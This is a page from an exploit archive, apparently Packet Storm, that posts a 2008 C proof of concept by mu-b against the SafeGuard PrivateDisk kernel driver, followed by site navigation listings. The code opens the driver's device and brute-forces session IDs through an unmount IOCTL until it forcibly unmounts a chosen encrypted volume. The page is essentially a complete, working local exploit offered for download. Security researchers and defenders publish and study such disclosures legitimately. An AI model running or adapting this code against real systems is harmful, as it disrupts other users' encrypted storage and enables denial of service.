SafeGuard PrivateDisk Local Kernel Device unmount Exploit

SafeGuard PrivateDisk Local Kernel Device unmount Exploit: Posted Jan 10, 2011; Authored by mu-b | Site digit-labs.org; Ultimaco Safeware AG (Sophos) - SafeGuard PrivateDisk local kernel device unmount exploit.; tags | exploit, kernel, local; SHA-256 | 5c9454bb523d0ecda8cb5589d0fce3117a6fd6b4592ccdd0d7fecd3a7736a21b; Download | Favorite | View

SafeGuard PrivateDisk Local Kernel Device unmount Exploit

/* safeguard-pdisk-unmount.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk unmount exploit
 * by mu-b - Wed 05 Mar 2008
 *
 * - Tested on: privatediskm.sys 2.2.0.16
 *                (<= Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk 2.0)
 *              privatediskm.sys
 *                (<= Sophos - SafeGuard PrivateDisk 2.3)
 *
 * This exploit 'tunnels' an ioctl request to the mounted volume device
 * for the volume file given in the argument, the request will forcibly
 * unmount the device.
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>
#include <ddk/ntapi.h>

#define SGPD_UNMOUNT_IOCTL      0x0007200C
#define SGPD_MAX_SESSION_ID     0xFFFFF

struct ioctl_req {
  int  session_id;
  char volume_buf[0x200];
};

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  DWORD i, j, rlen;
  CHAR buf[0x100];
  HANDLE hFile;
  BOOL result;

  printf ("Utimaco Safeware AG - SafeGuard PrivateDisk unmount exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <volume file>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  hFile = CreateFileA ("\\\\.\\PrivateDisk", GENERIC_READ,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  memset (buf, 0, sizeof buf);
  strncpy (buf, argv[1], sizeof buf - 1);

  for (i = 0, j = 0; i < sizeof req.volume_buf - 4; i += 2, j++)
    {
      req.volume_buf[i] = buf[j];
      req.volume_buf[i+1] = 0x00;
    }

  for (i = 0; i < SGPD_MAX_SESSION_ID; i++)
    {
      req.session_id = i;

      result = DeviceIoControl (hFile, SGPD_UNMOUNT_IOCTL,
                                &req, sizeof req,
                                &req, sizeof req, &rlen, 0);
      if (result)
        {
          printf ("* found, session_id: %d, volume name: %s", i, buf);
          break;
        }

      if (!(i % 64))
        {
          printf ("* trying session_id: %d\r", i);
        }
    }
  printf ("\n* done\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}

Top Authors In Last 30 Days

Red Hat 282 files
Jay Turla 150 files
indoushka 149 files
Ubuntu 69 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 31 files
H D Moore 31 files
Debian 30 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,059)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,725)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,806)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

SafeGuard PrivateDisk Local Kernel Device unmount Exploit

SafeGuard PrivateDisk Local Kernel Device unmount Exploit

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SafeGuard PrivateDisk Local Kernel Device unmount Exploit

Share This

SafeGuard PrivateDisk Local Kernel Device unmount Exploit

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems